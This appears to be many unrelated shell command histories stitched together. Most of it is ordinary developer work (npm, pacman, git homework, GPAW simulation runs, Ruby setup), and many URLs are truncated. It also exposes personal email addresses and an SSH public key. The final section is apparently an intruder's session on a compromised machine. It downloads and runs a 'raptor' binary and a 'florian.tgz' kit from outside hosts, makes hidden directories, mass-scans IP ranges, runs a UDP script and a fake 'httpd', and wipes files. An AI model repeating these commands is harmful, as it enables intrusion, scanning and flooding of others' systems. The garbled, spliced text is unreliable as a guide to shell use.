/home/sahudeepak154/.npm/_logs/2019-06-13T06_42_56_015Z-debug.log +npm run +npm install +npm start +netstat -a +ps -ef |grep 8080 +ps -ef |grep 10000 +ls -l +cat webpack.config.js +jenkins --version +ps -ef |grep 8080 +netstat -t +netstat -anp | find ":8080" +npm start +cat /home/sahudeepak154/.npm/_logs/2019-06-13T06_52_34_069Z-debug.log +ps -ef |grep https +ps -ef |grep httpd +ps -ef |grep 80 +systemctl status apache2 +systemctl status stop +systemctl stop apache2 +systemctl stop apache2.service +sudo systemctl stop apache2.service +systemctl status stop +systemctl status apache2 +npm start +sudo apt-get install nodejs-legacy +npm start +ps -ef |grep jenkins +npm stop +npm status +npm help npm +netstat -tulpn | grep LISTEN +ifconfig +npm start -htppPort=3000 +ps aux | grep node +ps -ef |grep 8080 +sudo lsof -i :8080 +kill -9 2010 +sudo lsof -i :8080 +kill -9 2010 +sudo lsof -i :8080 +npm start -htppPort=3000 +netstat -tulpn | grep LISTEN +npm start +hostname +npm start +apt-get install apache2 +sudo apt-get install apache2 +systemctl status apache2 +sudo systemctl start apache2 +systemctl status apache2 +npm start +git s +git status +ls +ps -ef grep |httpd +ps -ef | grep apache2 +npm start +systemctl start apache2 +sudo systemctl start apache2 +sudo systemctl status apache2 +sudo systemctl start apache2 +sudo systemctl status apache2 +netstat -ntplu|grep listen +netstat -ntplu|grep LISTEN +sudo systemctl stop apache2 +sudo systemctl status apache2 +sudo systemctl start apache2 +ls +sudo systemctl stop apache2 +sudo systemctl status apache2 +sudo systemctl stop apache2 +sudo yum install nodejs +ls +systemctl status apache2 +sudo systemctl start apache2 +systemctl status apache2 +ls +ls +vim index.html +ls +cat index.html +>index.html +echo "HELO SAMSUNG" index.html +npm start +sudo npm start +ls +ls +ls +cat index.html +vim index.html +npm start +ls +cat webpack.config.js +ls +ls +cat index.js +ls +ls +cat style +ls +cat style.css +ls +ls +vim index.js +wq +:::\ +npm start +npx create-react-app helloworld +ls +npm start +ls +ls +ls +rm REACTJS/ +ls +rm -rf REACTJS/ +ls +rm -rf reactApp snapApp.js +ls +rm -rf snap +rm -rf App.js +mkdir react +npm create-react-app helloworld +npm -v +npm create-react-app helloworld +npx create-react-app helloworld +vim asd.py +vim .Xresources +xrdb .Xresources +python +vim .Xresources +xrdb .Xresources +vim .Xresuorces +ls -a +vim .Xresources +xrdb .Xresources +python +clear +ls +mkdir projs +ls +pip +sudo pacman -S python-pip +pip install django +sudo pip install django +sudo pip install django-filter +sudo pip install Markdown +ls +django-admin.py startproject scrum +ls +ls +python manage.py startapp board +ls +sudo pip install djangorestframwork +sudo pip install djangorestframework +ls +vim scrum/settings.py +aurman -S leanote +aurman -Syu +clear +yaourt -Syu +yaourt -S leanote +leanote +sudo pacman -S libgtk +sudo pacman -S libgtk2.0 +sudo pacman -S ibgtk2.0-0:i386 +sudo pacman -S lib32-gtk2 2.24.32-1 +sudo pacman -S lib32-gtk2 +sudo pacman -S lib32-gtk2 +sudo pacman -S libgdk-x11-2.0.so.0 +sudo pacman -S libgdk-x11-2.0 +sudo pacman -S libgdk-x11 +sudo pacman -S libgdk +sudo pacman -S libgtk +sudo pacman -S gtk2 +leanote +sudo pacman -S gtk3 +sudo pacman -R gtk2 +leanote +sudo pacman -S gtk2 +leanote +sudo pacman -S pango +leanote +sudo pacman -S harfbuzz +leanote +yaourt -S leanote +sudo pacman -S leanote +leanoet +leanote +sudo pacman -Rds leanote +sudo pacman -R gtk2 +clear +sudo pacman -Rds aurman +ls +ls +tar -zxvf leanote-linux-amd64-v2.6.1.bin.tar.gz +ls +ls +ls +ls +ls +ls +ls +ls +npm install +ls +electron . +sudo pacman -S electron +electron . +ls +ls +ls +./app +ls +./run.sh +vim run.sh +. run.sh +ls +bash run.sh +ls +ls +ls +ls +./leanote +ls +ls +ls +ls +./leanote-linux-amd64 +bash run.sh +\ +ls +ls +rm -rf * +ls +which python +vim .global_extra_conf.py +vim .vimrc +vim .vimrc +vim .vimrc +vim .vimrc +vim .vimrc +vim .vimrc +vim .vimrc +vim .vimrc +vim .vimrc +vim .vimrc +vim .vimrc +vim .vimrc +vim .vimrc +vim .vimrc +vim .vimrc +vim .vimrc +ls +ls +ls +vim scrum/settings.py +ls +vim asd.md +ls +python manage.py runserver +zls +clear +ls +ls +ls +ssh +sudo pacman -S openssh +sudo pacman -S opensvn +sudo pacman -S openvpn +openvpn +clear +ls +ls /etc +ls /etc/openvpn +ls /etc/openvpn/client +sudo ls /etc/openvpn/client +sudo vim /etc/rc_maps.cfg +ls +git clone github.com/ycm-core/YouCompleteMe.git +git clone +git clone +git clone +ls +ls +python install.py +python install.py --all +python install.py --jedi-completer +git submodule update --init --recursive +python install.py --jedi-complete +python install.py --go-completer +vim .vimrc +vim asd.py +vim asd.go +vim asd.c +gcc asd.c +ls +ls +ls +python install.py +ls +vim install.sh +bash install.sh +python install.py --all\ +python install.py --all +ls +vim .vimrc +python asd.py +vim asd.py +sudo pacman -S csharp +sudo pacman -S c# +sudo pacman -S dotnet +sudo pacman -S .net +sudo pacman -S dotnet-core +vim .vimrc +vim +ls +vim .vimrc +vim asd.py +ls +ls -a +mv .global_extra_conf.py .vim/ +ls +vim .vimrc +sudo pacman -S freerdp +sudo pacman -S remmina +sudo wifi-menu +ping baidu.com +ping www.baidu.com +nmtui +conky +sudo systemctl enable sshd.service +sudo systemctl start sshd.service +ssh +ls +vim scrum/settings.py +vim .vimrc +vim ~/.vimrc +ls ~/.vim/ +ls -a ~/.vim/ +vim ~/.vim/.global_extra_conf.py +which django +ls /usr/ +ls /usr/lib +ls /usr/lib |grep django +ls /usr/lib |grep python +ls /usr/lib/python3.7 +ls /usr/lib/python3.7/site-packages +ls /usr/lib/python3.7/site-packages/django +ls /usr/lib/python3.7/site-packages/django +sudo pacman -S rxvt-unicode +urxvt +vim .Xresources +xrdb .Xresources +sudo pacman -R rxvt-unicode +vim .Xresources +xrdb .Xresources +startx +sudo vim /etc/ssh/sshd_config +sudo systemctl start sshd.service +sudo systemctl stop sshd.service +sudo systemctl start sshd.service +ssh liwis@ +sudo vim /etc/ssh/sshd_config +sudo systemctl stop sshd.service +sudo systemctl start sshd.service +ssh liwis@ +reboot +ssh +ssh liwis@ +sudo ls /etc/ssh +sudo ls /etc/ssh/ssh_config +sudo vim /etc/ssh/ssh_config +history +sudo vim /etc/ssh/sshd_config +sudo vim /etc/ssh/sshd_config +sshd +sshd +ssh liwis@ +sudo vim /etc/ssh/ssh_config +sudo vim /etc/ssh/sshd_config +sudo vim /etc/ssh/ssh_config +sudo systemctl stop sshd.service +sudo systemctl start sshd.service +ssh liwis@ +ls +startx +sudo systemctl stop sshd.service +sudo systemctl start sshd.service +ls +ls Downloads/ +tar -zxvf 'download (1)' +sudo pacman -S 7z +sudo pacman -S p7z +sudo pacman -S p7zip +7z +ls +7z x 'download (1)' +ls +ls +vim 安装说明.txt +ls +sudo modprobe tun +vpn +openvpn +ls +vim client.ovpn +vim client.ovpn +openvpn client.ovpn +nmtui +ping www.baidu.com +ls +openvpn client.ovpn +ls +sudo modprobe tun +sudo openvpn client.ovpn +ls /etc +ls /etc|grep rc +nmtui +s +ls +vim a.sh +bash a.sh +vim a.sh +ls +vim a.sh +bash a.sh +vim a.sh +bash a.sh +ls +mv -r config ~/bcx211vpn +mv config ~/bcx211vpn +bash a.sh +vim a.sh +which bash +./a.sh +bash a.sh +sudo chmod 777 a.sh +./a.sh +nmtui +nmtui +./a.sh +ls +lscpi +ls_cpi +lsacpi +lscpi +sudo pacman -S lscpi +lspci +vim .config/polybar/config +startx +shutdown now +sudo pacmanmxcvg,h.vjmk,ljuryed6g +sudo pacman -Syu +nmtui +sudo pacman -Syu +sudo pacman -Syu +sudo pacman -Syu +ls +ls +./a,sh +./a.sh +ls +vim .config/i3/config +vim .config/i3/config +vim .config/i3/config +vim .config/i3/config +vim .config/i3/config +vim .config/i3/config +sudo pacman -Syu +startx +sudo pacman -Syu +ls +ranger +ls +ls / +ls /proc +ls /proc/bus +ls /proc/bus/input +sudo vim /proc/bus/input/devices +ls /proc/1 +ls /proc/1 +sudo vim /proc/version + zsh +sudo pacman -S zsh +zsh --help +zsh +ls +ls +./a.sh +echo $SHELL +zsh +sudo pacman -S zsh-completions +zhs +zsh +ls -a +zsh +ls -a +autoload -Uz zsh-newuser-install +zsh-newuser-install -f +Zsh +ls /usr/bin +vim .zshrc +compinit +vim .zshrc +ls +zsh +ls -a +vim .vimrc +vim .zshrc +zsh +./usr/bin/zsh +ls /usr/bin +ls /usr/bin/zsh +./usr/bin/zsh +vim /usr/bin/zsh +bash /usr/bin/zsh +./usr/bin/zsh +/usr/bin/zsh +ls -a /root +sudo ls -a /root +sudo pacman -R zsh +sudo pacman -Rds zsh +sudo pacman -Rd zsh +startx +ls +ls -a +vim .zshrc +vim .zshrc +sudo pacman -Rds zsh-completions +sudo pacman -Rds zsh +sudo pacman -S zsh +ls -a +sudo ls /root +sudo ls -a /root +zsh +sudo pacman -Rds zsh +yaourt -S zsh +ls +ls -a +compinit +sudo pacman -S oh-my-zsh +wget +sudo pacman -S wget +wgetssell/oh-my-zsh/raw/master/tools/install.sh +wget -O-sercontent.com/robbyrussell/oh-my-zsh/master/tools/install.sh +yaourt -S oh-my-zsh +yaourt -S oh-my-zsh-git +ls +ls -a +oh-my-zsh +sh -c "$(wget -O-sercontent.com/robbyrussell/oh-my-zsh/master/tools/install.sh)" +git clonessell/oh-my-zsh.git +git clonessell/oh-my-zsh.git +reboot +curl +git clonessell/oh-my-zsh.git +curl -Lo install.shsercontent.com/robbyrussell/oh-my-zsh/master/tools/ins +ls +sh install.sh +ls +ls -a +sh install.sh +vim install.sh +sh install.sh +ls +git clonessell/oh-my-zsh.git +ls +git clonessell/oh-my-zsh.git +sh -c "$(curl -fsSLsercontent.com/robbyrussell/oh-my-zsh/master/tools/install.sh)" +zsh +zsh +ls +vim .zshrc +zsh +zsh +vim .bashrc +ruby -e "$(curl -fsSLstall)" +brew doctor +ruvy -v +ruby -v +ls -al ~/.ssh +ssh-keygen -t rsa -C "milesstarkenburg@gmail.com" +eval "$(ssh-agent -s)" +ssh-add ~/.ssh/id_rsa +pbcopy < ~/.ssh/id_rsa.pub +ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDaOz7k4PPT3Da3urHHUglK/QftXJAD7mc6ThS0psaCZOcPPDsneAsCzy/v8g9cqmzjyJ6gPkODX2nvNVNAJ5qH5OdhI6iMqyqQvv/NaGl0GhuY2wDn7hY9OTd82CuPL8hd1TepVfXUN15gfgIJwFt3+fBSdfxzk7FT5YHLq5Prqh3AQ8zAUCONpJ106hyPbMJMQqv+c1WahsUpOU9m1rgNdsrUp78weLnAUCP2sugPdiwY1nrFacoF7PT7sFtvjgiiPQZSe0v3OS/477RrTu/fW4eQ7On1xVu6Rm6Fxh1OheN2X4PR958Z7vhLzK2jkWUTBylzZEW8sB1dAik/wfu9 milesstarkenburg@gmail.com +ruby -e "$(curl -fsSLstall)" +brew +brew list +brew install rbenv +exit +vim +exit +brew uninstall rbenv +vim .bash_rc +rm .bash_rc +\curl -sSLsh -s stable +source /Users/miles/.rvm/scripts/rvm +rvm get stable && rvm install 2.1.1 --patch railsexpress +curl get.pow.cx | sh +brew install mysql +ln -sfv /usr/local/opt/mysql/*.plist ~/Library/LaunchAgents +launchctl load ~/Library/LaunchAgents/homebrew.mxcl.mysql.plist +ls +mkdir Projects +ls +git clone +git clone +ls +ls -a +ls +bin/bootstrap +vim .env.development +bin/bootstrap +script/zeus +script/zeus +exit +zeus resources_test +rake db:test:prepare +rake db:test:prepare + git clones.git +ls +mv dotfiles/ ~ +ls +ls +ls +.. +ls +install.sh +ls +install.sh +sh -c "`curl -fsSLs/master/install.sh`" +brew install zsh +ls +ls +ls +ls +/usr/local/bin/brew install zsh +vim +exit +exit +which rvm +which ruby +zeus rspec +zeus rspec +zr +exit +zeus rspec +bash -v +exit +zeus rspec +source ~/.bashrc +zeus rspec +exit +rehash +exit +which ruby +exit +which ruby +bash +exit +which bash +ls +exit +zues/rspec +zeus rpsec +zeus rspec +zsh +unset DYLD_LIBRARY_PATH ; unset LD_LIBRARY_PATH +mkdir -p ~/.boot2docker +if [ ! -f ~/.boot2docker/boot2docker.iso ]; then cp /usr/local/share/boot2docker/boot2docker.iso ~/.boot2docker/ ; fi +/usr/local/bin/boot2docker init +/usr/local/bin/boot2docker up +$(/usr/local/bin/boot2docker shellinit) +docker version +export DOCKER_CERT_PATH=/Users/miles/.boot2docker/certs/boot2docker-vm + export DOCKER_TLS_VERIFY=1 + export DOCKER_HOST=tcp:// + export DOCKER_HOST=tcp:// +ag private +ag private(?private)" +ag "private(?")" +exit +top +sudo apt-get updat +sudo apt-get update +sudo apt-get upgrade +sudo apt-get update +sudo apt-get upgrade +sudo reboot +sudo apt-get update +sudo apt-get upgrade +sudo apt-get linux-headers-server +sudo apt-get install linux-headers-server +sudo apt-get update +sudo apt-get upgrade +sudo apt-get install linux-server +sudo apt-get update +sudo apt-get upgrade +sudo apt-get install python-software-properties +sudo add-apt-repository ppa:campos-dev/ppa +sudo add-apt-repository ppa:campos-dev/campos +sudo apt-get update +sudo apt-get install gpaw +sudo apt-get update +sudo apt-get install python-ase +sudo apt-get install gpaw-setups +sudo apt-get install ssh +sudo apt-get install openmpi + +reboot +sudo reboot +scp -r renat@fii.fi.tartu.ee:amAu111BF4 ~/amAu111BF4 +ls -l +ls -l +sudo rm renat@fii.fi.tartu.ee +sudo rm -r renat@fii.fi.tartu.ee +ls -l +exit +ls +ls +less 22.py +sudo ls +ls +less 8Si.py +ls ~ +ls /home/dirac/amAu111BF4/22.py +less /home/dirac/amAu111BF4/22.py +less 8Si.py +less 2Al.py +ls +ls +ls +less 22.py +less 64.py +mpirun -np 1 gpaw-python 22.py > log.txt & +tail -f log.txt +top +tail -f log.txt +less log.txt +top +mpirun -np 1 gpaw-python 22.py +mpirun -np 8 gpaw-python 22.py +top +ping www.yahoo.com +sudo ifconfig up +sudo ifconfig etho up +sudo ifconfig eth0 up +ifconfig +ping www.yahoo.com +sudo ifconfig eth0 up +sudo ifconfig up +sudo /etc/init.d/networking restart +ping www.yahoo.com +sudo /etc/init.d/networking restart +sudo /etc/init.d/networking star +sudo service networking start +ping www.yahoo.com +sudo service networking stop +history +history | less +ping www.yahoo.com +ifconfig +ls /etc/network/interfaces +less /etc/network/interfaces +sudo ifup etho0 +sudo ifup eth0 +sudo restart now +sudo restart +sudo restart -h +sudo restart --help +sudo shutdown now +ping www.yahoo.com +sudo ifup eth0 +ping www.yahoo.com +sudo ifup eth0 +sudo ifup eth3 +sudo ifup eth0 +modprobe e1000 +sudo ifup eth0 +whereis dhcpcd +dmesg | less +man dmesg +ifconfig -a +sudo ifup eth1 +ping www.yahoo.com +sudo ifup eth1 +sudo ifup eth0 +sudo ifup eth1 +sudo ifconfig up eth1 +sudo ifconfig --help +sudo ifconfig --help | less +sudo ifconfig --help 2>&1 | less +sudo ifconfig eth1 up +ping www.yahoo.com +sudo ifconfig eth2 up +sudo ifconfig eth0 up +sudo ifconfig eth3 up +ping www.yahoo.com +sudo service networking restart +sudo service networking stop +ping www.yahoo.com +sudo /etc/init.d/networking +sudo /etc/init.d/networking restart +sudo ifconfig +ls /etc/network/interfaces +less /etc/network/interfaces +ifconfig eth0 up +ifconfig eth1 up +sudo ifconfig eth0 up +whereis eth1 +clear +sudo ifconfig up +lshw +lshw | grep eth +sudo nano /etc/network/interfaces +sudo /etc/init.d/network restart +sudo /etc/init.d/networking restart +sudo nano /etc/network/interfaces +sudo /etc/init.d/networking restart +ping www.yahoo.com +man /etc/network/interfaces +apt-get install lynx +sudo apt-get install lynx +wgets/collectd-5.0.0.tar.gz +ls +tar -xzf collectd-5.0.0.tar.gz +ls +less README +./configure +make all +sudo make install +ls +less etc/collectd.conf +sudo less etc/collectd.conf +sudo apt-get install librrd2-dev +less /opt/collectd/etc/collectd.conf +sudo less /opt/collectd/etc/collectd.conf +ls +ls +sudo make remove +sudo make uninstall +sudo rm -rf /opt/collectd/ +./configure | tee out.text +less out.text +sudo apt-get install librrd2-dev +./configure | tee out.text +less out.text +make clean +make +make all +sudo make install +less /opt/collectd/etc/collectd.conf +sudo less /opt/collectd/etc/collectd.conf +sudo less /etc/init.d/networking +ls +ls +ls etc/ +sudo find . -name collectd +less sbin/collectd +less include/collectd/ +less /etc/rc.local +ls -al /etc/rc.local +sudo /opt/collectd/sbin/collect +top +less etc/collectd.conf +sudo less etc/collectd.conf +whereis rrdtool +history | grep rrd +apt-get install rrdtool +sudo apt-get install rrdtool +rrdtool +rrdtool graph +rrdtool graph | less +rrdtool graph var/lib/collectd/dirac.lan/cpu-0 +ls +rrdtool grep tessh localhost +ls +ls +mpirun -np 4 gpaw-python 22.py +top +ls -la /opt/collectd/var/lib/collectd/dirac.lan/cpu-0/cpu-idle.rrd +date +ps auwx | grep collectd +ls +less rc.local +ls +grep collectd * + +grep collectd * -Ir +ls ../rc.local +less ../rc.local +ls +ls +mpirun -np 2 gpaw-python 22.py +ls -la 22.txt +date +less 22.txt +top +gpaw-python 22.py +gpaw-python -np 22.py > out.txt +mpirun -np gpaw-python 22.py > out.txt +ls +mpirun -np 2 gpaw-python 22.py > out.txt +less 22.py +mpirun -np 2 gpaw-python 22.py > out.txt +ifconfig +nslookup localhost +ping www.yahoo.com +sudo service networking restart +ping www.yahoo.com +sudo service networking stop +sudo service networking start +ping www.yahoo.com +sudo /etc/init.d/networking restart +ping www.yahoo.com +ifconfig +ls +unzip Attachments_2011_04_19.zip +sudo apt-get install unzip +unzip Attachments_2011_04_19.zip +top +ls +mpirun -np 2 Bi-4-8nodes.py +mpirun -np 2 gpaw-python Bi-4-8nodes.py +top +mpirun -np 2 gpaw-python Bi-4-8nodes.py +less Bi-4-8nodes.py +mpirun -np 2 gpaw-python Bi-4-8nodes.py +mpirun -np 8 gpaw-python Bi-4-8nodes.py +ls +less Bi111dl-1.65.txt +mpirun -np 2 gpaw-python da-k-4nodes.py +mpirun -np 2 gpaw-python da-k-4nodes.py | tee out.txt 2>&1 +less out.txt +mpirun -np 2 gpaw-python da-k-4nodes.py 2>&1 | tee out.txt +less out.txt +ls da-k-4nodes.py +less da-k-4nodes.py +less da-k-2nodes.py +less dl-k-2nodes.py +mpirun -np 2 gpaw-python dl-k-2nodes.py +top +mpirun -np 2 gpaw-python da-h-8nodes.py +mpirun -np 2 gpaw-python Bi-4-8nodes.py +mpirun -np 2 gpaw-python da-h-8nodes.py +mpirun -np 2 gpaw-python dl-k-2nodes.py +top +ls +ls -la +date +ls +rm collectd-5.0.0.tar.gz +rm -rf collectd-5.0.0/ +ls +ps auwx | grep collectd +grep * -Ir collectd +grep -Ir collectd * +grep -Ir collectd * +ls +ls -la +sudo nano collectd +ifconfig +sudo cp /home/dirac/collectd . +chmod a+xr collectd +sudo chmod a+xr collectd +sudo chown root collectd +ls -la +ls -la | collectd +ls -la | grep collectd +ps auwx | grep collectd +sudo service collectd start +whereis collectd +sudo nano collectd +sudo service collectd start +ps auwx | grep collectd +sudo /etc/init.d/collectd start +ps auwx | grep collectd +sudo nano collectd +sudo /etc/init.d/collectd start +sudo nano collectd +sudo /etc/init.d/collectd start +ps auwx | grep collectd +sudo /etc/init.d/collectd stop +ps auwx | grep collectd +sudo nano collectd +man update-rc.d +sudo update-rc.d collectd defaults +sudo shutdown now +ls +ls +ls +man pidof +ls +less ssh +grep stat_busy * +less bootlogd +grep stat_fail * +ls +nano bootlogd +less cron +ls /tmp/ +ls +yop +top +ls -la +less experiment.out +top +ls -la +less 32.txt +ls -la +less amAu111BF4/32.py +ls -la +ps auwx | grep pyt +ls -la +less 32.txt +top +ls -la +less 32.txt +ls -la +less 32.txt +ls -la +less 32.txt +ls +less experiment.out +less 32.txt +top +less 32.txt +top +ls +ls -la +less 32.txt +ls +ls -la +top +ls -la +less 32.txt +top +ls -la +top +ls -la +top +ls -la +date +less /tmp/d2c.context +ls +top +ls +ls -lh .git/salvus/ +ls -lh .git/salvus/bundles/ +ls -lh .git/salvus/bundles/ +ls +more 2013-02-14-amath.salvus +mdkir 2013-02-14-amath +mkdir 2013-02-14-amath +ls +clear +ls +mv 2013-02-14-amath.salvus 2013-02-14-amath +wgets.ucm.es/david/jornada-sage-python/charlas/Pablo_Angulo/Introduccion_a_SAGE_files/sage_banner.png +wgets/d/d4/Sage_logo_new.png +mv Sage_logo_new.png sagelogo.png +ls +cat * +clear +ls +ls +git status +git log +git remote add originstein/salvus-seminar-talks.git +git push -u origin master +git push -u origin master +git push +ls +git push +ls +touch demo.salvus +rm demo.salvus +mv ~/scratch/demo.salvus . +git push +scp wstein@localhost:Downloads/8*.jpg . +mv 858277_10151343848368682_360537051_o.jpg 2013-02-14-amath/ramp.jpg +convert ramp.jpg ramp.png +ls +rm ramp.jpg +rails new transcriptable5 +mkdir transcriptable5 +sudo apt-get update +sudo apt-get upgrade +sudo apt-get install +sudo apt-get install mp3splt +sudo apt-get install mp3wrap +sudo apt-get install curl +sudo apt-get install libssl-dev +sudo apt-get install libxslt-dev libavcodec-extra-53 zliib1g-dev +sudo apt-get install zlib1g-dev build-essential libyaml-dev libreadline-dev +sudo add-apt-repository ppa:jon-severinsson/ffmpeg +sudo apt-get update +sudo apt-get install ffmpeg +sudo apt-get install frei0r-plugins +curl -Lsh -s stable --ruby +gpg --keyserver hkp://keys.gnupg.net --rec-keys d39dc0e3 +gpg --keyserver hkp://keys.gnupg.net --recv-keys d39dc0e3 +curl -Lsh -s stable --ruby +source /home/ubuntu/.rvm/scripts/rvm +source ~/.rvm/scripts/rvm +rvm use 2.1.5 --default +gem install typingpool +tp-config +tp-make +rails new +sudo apt-get isntall ruby-railties-4.0 +sudo apt-get install ruby-railties-4.0 +rails new transcriptable5 +rails new one +tp-make +ps +top +mkdir +mkdir bin +vi primeiro +chmod +xprimeiro +chmod +x primeiro +./primeiro +cat +touch ~/.vimrc +echo "PATH=\$PATH:cygdrive/c/Python34">>.bash_profile +git remote add originswim/Intro_to_Computing.git +git init +git remote add originswim/Intro_to_Computing.git +git pull +git pull +ls +git branch --set-upstream-to=origin/ master +git fetch +git pull +ls +git merge +git remote add Intro_to_Computing.gitswim/Intro_to_Computin +git remote add Intro_to_Computing.gitswim/Intro_to_Computing +git remove Intro_to_Computing.git +ls +git remote add Intro_to_Computing.gitswim/Intro_to_Computing +git remote rm Intro_to_Computing.git +git remote add Intro_to_Computing.gitswim/Intro_to_Computing +git fetch +git fetch oritin +git fetch origin +ls +git pull origin master +ls +git pull origin master +git fetch +git pull +git pull origin master +ls +vi ex_4 +vi ex_4 +vi ex_5 +ls +vi ex_5 +ls bin +ls bin +ls /bin +ls /bin/* +ls /bin/?sh +ls /bin/*sh +ls +vi ex_5 +ls /bin/*sh +vi ex-5 +vi ex_5 +vi ex_5 +vim ex_5 +vi ex_5 +ls +vi ex_5 +logout +ls +ls +man ls +ls -ltr +man ls +man grep +man ls +man ls +echo 1+2+3 +1+2+3 +((1+2+3)) +echo ((1+2+3)) +bc 1+2+3 +bc +echo $((1+2+3)) +logout +ls +pwd +git +git status +git add HW_2/ex_5 +git commit -m "added ex_5" +git config --global user.email "kvswim@gmail.com" +git config --global user.name "kvswim" +git commit -m "added ex_5" +git push origin master +git push origin master +git push origin master +vi ex_5 +ls +ls +vi ex_5 +git sync +git add ex_5 +git commit -m "update" +git push origin master +git status +ls +git status +git add HW_2/ex_5 +git commit +git add HW_2/ex_5 -f +git commit -m "asdfasdf" +git pull +git pull origin master +git add HW_2/ex_5 +git commit -m "asdf" +ls +vi .ex_5.swp +ls +vi ex_5 +vi ex_5 +vi ex_5 +ls +git pull +git pull origin master +ls +git fetch +git pull origin master +git stash +git stash drop +git pull origin master +ls +rm .bashrc +git pull origin master +nano +vim +vi +python +python3.3 +python -V +python3 +exit +python3 +python3 ex_3_3.py +python3 ex_2_3.py +ls +ls +python3 ex_2_3.py +a=n +del a +print a +python3 +exit +ls +ls +ls +vi header.py +vi header.py +vi header.py +. header.py +vi header.py +vi header.py +vi header.py +. header.py +python3 header.py +vi header.py +vi header.py +vi header.py +python3 header.py +python3 +vi header.py +vi header.py +ls +mkdir HW_5 +vi ex_1_1.py +python3 ex_1_1.py +python3 +vi ex_1_2.py +vi ex_1_2.py +vi ex_1_2.py +python3 ex_1_2.py +python3 +vi ex_2_1.py +python3 ex_2_1.py +vi ex_2_1.py +python3 +git commit -m "started working on hw5" +git add . +git status +git push origin master +git status +git commit -m "hw5" +git push origin master +ls +python3 +ls +ls +vi ex_2_2.py +git status +git add . +git status +ls +python3 ex_2_3.py +vi ex_2_3.py +python3 ex_2_3.py +vi ex_2_3.py +python3 ex_2_3.py +vi ex_2_4.py +vi ex_3_1.py +python3 ex_3_1.py +vi ex_3_2.py +python3 ex_3_2.py +ls +vi ex_2_2.py +vi ex_2_1.py +ls +tar -cvf HW_5.tar . +ls +ls +git status +git add . +git commit -m "HW5 finished" +git push origin master +exit +python3 +ls +vi ex_3_2.py +vi ex_3_1.py +vi ex_2_4.py +vi ex_3_2.py +ls +tar cvf HW_6.tar . +git status +git add . +git pull +git pull origin master +git commit -m "hw6" +git push origin master +exit +ls +mkdir HW_7 +python3 +python3 stats.py 1 2 3 +python3 stats.py 1 2 3 +python3 stats.py 1 2 3 +python3 +python3 +python3 +python3 +python3j +python3 +python3 +python3 eg.py +python3 eeg.py +python3 eeg.py +python3 eeg.py +python3 eeg.py +python3 eeg.py +python3 eeg.py +python3 eeg.py +python3 eeg.py +python3 eeg.py +python3 eeg.py +python3 eeg.py +python3 eeg.py +python3 eeg.py +python3 eeg.py +python3 eeg.py +python3 eeg.py +python3 eeg.py +python3 eeg.py +python3 eeg.py +python3 eeg.py +python3 eeg.py +python3 eeg.py +python3 eeg.py +python3 eeg.py +python3 eeg.py +python3 eeg.py +python3 eeg.py +python3 eeg.py +git status +git add HW_7 +git add /HW_7 +git add HW_7/ +git add HW/HW_7 +git commit -m "hw7" +git push origin master +exit +git stash +git stash drop +git pull +git pull origin master +git status +git add HW/HW_8 +git commit -m "HW_8" +git pull +git pull origin master +git status +exit +# apt-get install git +# apt-get install git +sudo apt-get install git +git add Main.java +git init +nano Main.java +>git status +git status +git add Main.java.HelloWorld +git status +git add Main.java +git add . +git commit -m "My first impact on the multiverse" +git config - global user.email bryan.acosta1@upr.edu +git commit -m "My first impact on the multiverse" +git commit -m "My first impact on the multiverse" +git commit -m "My first impact on the multiverse" +git commit -m "First commit towards Hello World Repo" +sudo apt-get install git +git--version +sudo apt-get install git +mkdir HelloWorld +touch HelloWorld +nano HelloWorld +git status +public class Main { + public static void main(String args[]) { + System.out.println("Hello World"); + } +} +nano HelloWorld +git commit –m “First commit towards Hello World Repo.” +git add . +git commit -m "First commit towards Hello World Repo" +git confi-- global user.email bryan.acosta1@upr.edu +git config -- global user.name bryan.acosta1@upr.edu +git remote add originsta1/4035lab0.1.git +git push -u origin master +mkdir helloworld +git init +touch Main.java +nano Main.java +git status +git add . +git status +git commit -m "First commit towards Hello World Repo." +git config - global user.email bryan.acosta1@upr.edu +git commit -m "First commit towards Hello World Repo." +git log +git init +git remote add origin sta1/4035lab0.git> +git remote add originsta1/4035lab0.git +nano CirculeArea +git add . & git commit -m("Area calculation") +git add . & git commit -m "Area calculation" +mkdir areaCircule +git init +git add . & git commit -m "Area calculation" +nano CirculeArea +git add . & git commit -m "Area calculation" +git add . && git commit m "Area calculation" +git add . && git commit -m "Added perimeter feature" +git revert HEAD -m "Fixing mistakes" +git config -- global user.name bryan.acosta1@upr.edu +git push origin master +git remote add originsta1/4035lab0.git +git push -u origin master +git revert HEAD -m "Fixing mistakes" +git push origin master +git revert HEAD -m "Fixing mistakes" +shutdown +man shutdown +exit +lo.hn +ifconfig +man ifconfig +nano aual140312 +nano aula140312 +./aula140312 +nano aula140312 +./aula140312 +cat aula140312 +nano +chmod +x aula140312-2 +cat aual140312-2 +cat aula140312-2 +./aula140312-2 +nano aula140312-2 +./aula140312-2 +la -ls +pwd +la +la -ls +nano +nano aula 140312-3 +nano aula140312-3 +chmod +x aula 140312-3 +chmod +x aula140312-3 +./aula140312-3 +cat aula140312-3 +nano aula140312-3 +./aula140312-3 +1 +su +pico +$ num 7 +$ num=7 +nano +ls +./aula "140312" +./"aula 140312" +como assim permissão negada??? +ls -l +chmod +x "aula 140312" +./aula\ 140312 +cat aula\ 140312 +num=7 +num2=9 +if test $num -lt $num2; then echo "menor"; else echo "maior"; fi +menor +nano aula\ 140312 +chmod +x aula140312 +./aula140312 +diz +dir +ls +echo echo +echo else +echo aula140312-2 +w +w +uname -a +cat /etc/issue +php -v +mkdir " " +ls -a +ls +cat vuln.txt +screen -r +ps aux +rm -rf .borwind/ +last +ls -a +ls -a +ls +wgets.lycos.co.uk/mrx25/raptor +chmod +x raptor +./raptor +ls +rm -rf * +ps aux +ls -a +ls -a +./pwned +rm -rf * +mkdir .muie +ls +ls +ls -a +ls +cat mech.set +./crond +ls -a +wget shakimel.xhost.ro/florian.tgz +mkdir .mata +wget shakimel.xhost.ro/florian.tgz +tar xzvf wget shakimel.xhost.ro/florian.tgz +tar xzvf florian.tgz +rm -rf florian.tgz +ls +./start 217.91. +./start 217.91 +./start 205.234 +ssh +ssh ftpuser@ +ssh ftpuser@ +w +ls +uname -a +w +uptime +ls -al +ls +ls +ls +./a +./scan +./ab2c +ls +./scan +./scan 85.30;./scan 216.152;./scan 200.102;./scan 62.3./scan 216.89; +ls +ls +ls +ls +perl udp.pl +ls +chmod +x * +export PATH=. +httpd +ls +./httpd +chmod +x httpd +./httpd +chmod 666 httpd +./httpd +chmod 777 httpd +./httpd +rm -rf * +ls -aux +ls +rm -rf * +ls -aux 